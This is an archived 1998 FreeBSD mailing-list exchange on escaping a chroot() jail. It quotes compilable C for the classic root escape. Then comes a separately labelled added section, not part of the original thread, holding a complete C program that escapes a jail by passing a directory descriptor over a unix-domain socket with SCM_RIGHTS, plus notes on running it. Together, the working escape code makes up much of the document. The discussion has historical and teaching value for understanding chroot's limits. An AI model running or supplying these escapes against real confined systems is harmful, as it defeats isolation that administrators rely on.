From owner-freebsd-hackers Tue Nov 17 12:20:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA06290 for freebsd-hackers-outgoing; Tue, 17 Nov 1998 12:20:59 -0800 (PST) (envelope-from owner-freebsd-hackers@FreeBSD.ORG)
Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA06285 for ; Tue, 17 Nov 1998 12:20:58 -0800 (PST) (envelope-from julian@whistle.com)
Received: (from daemon@localhost) by alpo.whistle.com (8.8.5/8.8.5) id MAA13979; Tue, 17 Nov 1998 12:10:46 -0800 (PST)
Received: from current1.whistle.com(207.76.205.22) via SMTP by alpo.whistle.com, id smtpdj13975; Tue Nov 17 20:10:42 1998
Message-ID: <3651D810.42877E5C@whistle.com>
Date: Tue, 17 Nov 1998 12:09:52 -0800
From: Julian Elischer
Organization: Whistle Communications
X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2.7-RELEASE i386)
MIME-Version: 1.0
To: Eivind Eklund
CC: Mike Smith, Harold Gutch, zhihuizhang, hackers
Subject: Re: Question on chroot()
References: <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com> <19981117125419.28799@follo.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

Eivind Eklund wrote:
> 
> On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
> > > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote:
> > > > Breaking out of a chroot'ed environment is less easy if you're not
> > > > root
> > > Is this meant to be read as "more or less impossible", that is,
> > > impossible unless the user can become root first (due to insecure
> > > suid-root binaries in the chroot-environment etc.), or can users
> > > really break out in more or less every situation (of course
> > > assuming stuff like that they don't have any open filehandles
> > > pointing to the outside in the beginning).
> > 
> > It's quite difficult to break out of a chroot'ed environment, yes, and
> > it's intended to be impossible, so obviously you can only get out
> > through flaws in the implementation...
> 
> It is easy if you have root privileges inside the "jail".
> 
> /* pseudo-code, made compilable: run as root inside the jail */
> #include <fcntl.h>
> #include <unistd.h>
> #include <sys/stat.h>
> int main(void)
> {
>     int breakfd, i;
>     mkdir("mybreakdir", 0700);
>     breakfd = open(".", O_RDONLY, 0);  /* handle on the cwd, which stays outside the new root */
>     chroot("mybreakdir");              /* chroot() does not move the cwd */
>     fchdir(breakfd);
>     for (i = 0; i < 1000; i++)
>         chdir("..");                   /* climb past the jail up to the real root */
>     chroot(".");
>     return 0;
> }

I think I posted that a few years ago :)
I looked for it in the archives but couldn't find it.. where was it :-)

> 
> I'm not sure if you need the fchdir(); chroot() is not supposed to
> affect your current directory. I don't think anybody has fixed the
> above problem; it seems quite difficult to fix (you have to know which
> FDs are inside and outside the jail, which is non-trivial).

You can test all fds that are directories to see if they are outside
the chroot, and fail the chroot if there are any such.
However, it doesn't help, because you can fork, open a unix domain socket,
have the child do the chroot, and then have the parent send it an fd
that would have made the chroot fail.

Result.. chroot is only useful for friendly or non-root processes.

There could be a few things that would fix this.. e.g. don't allow
recursive chroots, but it's trickier than it first appears.

> 
> Eivind.
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-hackers" in the body of the message
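Added example, not code from the thread or from FreeBSD: the fork-plus-unix-domain-socket route Julian describes, as a complete C program. The parent keeps a descriptor for the real root, the child chroot()s into an empty directory, and only after that does the parent hand the descriptor across with SCM_RIGHTS; the child fchdir()s to it, walks up with chdir("..") and chroot(".")s back onto the real root. A check of the child's open directory fds at chroot() time would have found nothing, which is the point. The helper names (send_fd, recv_fd, same_dir, fd_passing_roundtrip, jailed_child) and the /tmp jail path are this example's own choices; it assumes a Unix with SCM_RIGHTS, the chroot step needs root, and fd_passing_roundtrip() runs unprivileged.

```c
/* Added example, not code from the thread: the fd-passing route Julian
 * describes. Assumes a Unix with SCM_RIGHTS; chroot() needs root, the fd
 * passing does not. Names such as send_fd/recv_fd/same_dir are this example's own. */
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Send one open descriptor over a unix-domain socket as SCM_RIGHTS ancillary data. */
int send_fd(int sock, int fd)
{
    char byte = 'x', cbuf[CMSG_SPACE(sizeof(int))];
    struct iovec iov = { &byte, 1 };
    struct msghdr msg;
    struct cmsghdr *cm;

    memset(&msg, 0, sizeof msg); memset(cbuf, 0, sizeof cbuf);
    msg.msg_iov = &iov; msg.msg_iovlen = 1;
    msg.msg_control = cbuf; msg.msg_controllen = sizeof cbuf;
    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET; cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive a descriptor sent with send_fd(); the kernel installs it as a new fd. */
int recv_fd(int sock)
{
    char byte, cbuf[CMSG_SPACE(sizeof(int))];
    struct iovec iov = { &byte, 1 };
    struct msghdr msg;
    struct cmsghdr *cm;
    int fd;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov; msg.msg_iovlen = 1;
    msg.msg_control = cbuf; msg.msg_controllen = sizeof cbuf;
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    cm = CMSG_FIRSTHDR(&msg);
    if (cm == NULL || cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS)
        return -1;
    memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

/* 1 if fd and path name the same directory (same device and inode), else 0. */
int same_dir(int fd, const char *path)
{
    struct stat a, b;
    if (fstat(fd, &a) != 0 || stat(path, &b) != 0)
        return 0;
    return S_ISDIR(a.st_mode) && a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

/* Unprivileged self-check: a root-directory fd survives the trip over a socketpair. */
int fd_passing_roundtrip(void)
{
    int sv[2], sent, got, ok;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return 0;
    sent = open("/", O_RDONLY);
    got = (sent >= 0 && send_fd(sv[0], sent) == 0) ? recv_fd(sv[1]) : -1;
    ok = got >= 0 && got != sent && same_dir(got, "/");
    close(sv[0]); close(sv[1]); close(sent); if (got >= 0) close(got);
    return ok;
}

/* Child: chroot into the jail first, then escape with the fd the parent sends. */
static int jailed_child(int sock, const char *jail)
{
    int outside, i;
    if (chroot(jail) != 0 || chdir("/") != 0) { perror("chroot"); return 1; }
    /* Every directory fd the child holds is now inside the jail; the outside fd arrives only now. */
    if ((outside = recv_fd(sock)) < 0 || fchdir(outside) != 0) { perror("recv_fd"); return 1; }
    for (i = 0; i < 1000 && chdir("..") == 0; i++)   /* climb to the real root */
        ;
    if (chroot(".") != 0) { perror("chroot"); return 1; }
    printf("child: /etc/passwd is %s\n", access("/etc/passwd", F_OK) == 0 ? "visible" : "hidden");
    return 0;
}

int main(void)
{
    int sv[2], rootfd; pid_t pid; char jail[] = "/tmp/jailXXXXXX";   /* jail path is an assumption */
    if (geteuid() != 0) { fprintf(stderr, "chroot needs root\n"); return 1; }
    if (mkdtemp(jail) == NULL || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) { perror("setup"); return 1; }
    if ((pid = fork()) == 0) { close(sv[0]); _exit(jailed_child(sv[1], jail)); }
    close(sv[1]);
    rootfd = open("/", O_RDONLY);          /* the handle the jail was meant to keep out */
    if (rootfd < 0 || send_fd(sv[0], rootfd) != 0) perror("send_fd");
    waitpid(pid, NULL, 0);
    rmdir(jail);
    return 0;
}
```

Run as root, the child reports /etc/passwd visible after having been chroot()ed into an empty directory; fd_passing_roundtrip() shows the descriptor transfer alone, without privilege. The check Julian proposes fails here precisely because the descriptor is not open in the child at the moment chroot() runs.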